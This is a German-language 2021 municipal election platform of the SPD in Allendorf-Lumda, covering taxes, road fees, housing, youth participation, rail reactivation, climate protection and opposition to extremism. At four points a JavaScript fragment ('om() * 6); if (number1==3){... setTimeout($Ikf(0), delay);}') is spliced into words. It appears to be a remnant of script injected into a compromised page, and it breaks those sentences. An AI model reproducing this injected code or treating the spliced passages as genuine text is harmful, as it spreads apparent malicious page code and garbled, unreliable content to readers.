Kommwahl2021

Leitlinien für die Kommunalwahl 2021

SPD Allendorf-Lumda
Leitlinien für die Kommunalwahl 2021

Ohne Wurzeln kann nichts wachsen und junge Triebe bringen neue Früchte!!

Deshalb tritt die SPD Allendorf-Lumda mit einem Team aus erfahrenen Kommunalpolitiker*Innen
und jüngeren Kräften zur Kommunalwahl 2021 an.

Wir freuen uns über Mitstreiter*Innen aus alt eingesessenen Allendorfer Familien und solchen, die
erst seit wenigen Jahren hier heimisch geworden sind.

Wir wollen mit diesem Team eine klug durchdachte, kreative Kommunalpolitik für und vor allem
mit allen Allendorfer*Innen betreiben.

Wir wollen unter den Bedingungen, die der Rahmen der finanziellen, geographischen und
strukturellen Möglichkeiten, die Allendorf bietet, optimale Konzepte entwickeln, Projekte
unterstützen und Voraussetzungen schaffen, die das Leben, Wohnen, Arbeiten, Bildung und die
Gestaltung von Freizeit für Jung und Alt in Allendorf liebens- und lebenswert machen.

Wir wollen in den nächsten Jahren kein ständiges Anheben der Grund- und Gewerbesteuer. Wir
wollen eine solide und planbare Haushaltsführung.

Wir fordern weiter vom Landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Hessen die Abschaffung der Straßenausbaubeiträge und stimmen in
Allendorf als zeitlich begrenzte Alternative für die Einführung der wiederkehrenden
Straßenausbaubeiträge wie in Rabenau.

Wir setzen uns für den weiteren Ausbau der interkommunalen Zusammenarbeit mit Rabenau ein,
da wo sie sinnvoll ist und die Zustimmung der Allendorfer*Innen findet und wo sie nachhaltige
finanzielle Vorteile für beide Kommunen bringt. Unser Ziel ist, die Schaffung eines
funktionierenden Verwaltungsverbandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ands in der nächsten Wahlperiode zügig voranzutreiben.

Wir wollen nach Wegen und Förderungsmöglichkeiten suchen, dass heimische Gewerbetreibende
vor Ort bleiben.

Wir werden die Planung von Neubaugebieten unterstützen. Dabei werden wir besonders darauf
achten, dass sowohl sozialverträgliche, barrierefreie und generationengerechte Wohnungen und
Häuser gebaut werden, aber auch der Zuzug junger Familien gewährleistet wird. In diesem
Zusammenhang verlangen wir weiter den Beitritt der Stadt in die SSW.

Wir stimmen Plänen zu, die der Neugestaltung und dem Umbau innerstädtischer Wohngebiete
dienen, wenn auch hier Wohnungen mit moderaten Mieten entstehen und sie der
Attraktivität und dem Erscheinungsbild dieses Stadtteils entsprechen. Auch in diesem
Zusammenhang ist der Beitritt der Stadt in die SSW von Vorteil.

Wir wollen, dass Jugendliche und junge Erwachsene ihre Interessen tatkräftig vertreten und ihre
Gegenwart und Zukunft in Allendorf maßgeblich mitgestalten können. Deshalb unterstützen wir
die Arbeit des zukünftigen Kinder- und Jugendparlaments. Die Wahl einer/ eines
Jugendbeauftragten aus den Reihen des Stadtparlaments werden wir vorantreiben.

Wir bieten unsere Hilfe für die Reaktivierung des Seniorenbeirates an.

Wir setzen uns weiter für die Reaktivierung der Lumdatalbahn als ein wirksames Projekt zur
Verbesserung der Verkehrsanbindung und der Mobilität ein. Mit der Lumdatalbahn wird
Allendorf als Wohnort für viele Menschen attraktiver.

Wir unterstützen und fördern energieeffiziente Bauvorhaben, z.B. Blockheizwerke, den
nachhaltigen Schutz von Natur- und Umwelt, z.B. schotterfreie Gärten und Blühwiesen und sehen
in der Anstellung eines Klimaschutzmanagers eine sinnvolle Maßnahme, die den Allendorfer*Innen
von großem Nutzen sein kann.
Für Verkehrswende und Klimaschutz als Aufgabe, die vor allem im Verbund mit den andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen
Kommunen auf der Ebene des Landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andkreises zu lösen ist, sagen wir als Allendorfer SPD Fraktion
unsere Unterstützung zu.

Es ist uns ein Anliegen, das Bürgerhaus in Allendorf wieder mit Leben zu füllen. Wir werden alle
Ideen von Bürger*Innen, Vereinen und den Schulen unterstützen, aber auch eigene entwickeln, wie
wir gemeinsam für Allendorf dieses Gebäude zu einem Ort der Begegnung machen können.

Wir unterstützen die Arbeit der Ortsbeiräte in den Stadtteilen Climbach und Nordeck/Winnen.
Unsere gewählten Vertreter in den Ortsbeiräten sorgen dafür, dass den Anliegen der Bürger*innen
in den Stadtteilen Gehör verschafft wird und auftauchende Probleme gelöst werden können.

Als SPD-Fraktion im Stadtparlament setzen wir uns mit aller Kraft dafür ein, dass
demokratiefeindliche, populistische und rechtsextreme Reden und Taten , wie das Abmontieren
von Schildern oder Schmierereien auf öffentlichen Plätzen und an Gebäuden, in unserer Stadt
keine Bühne geboten wird.

Mit einer starken SPD wird eine transparente, sachkompetente und bürgernahe Kommunalpolitik
in Allendorf garantiert.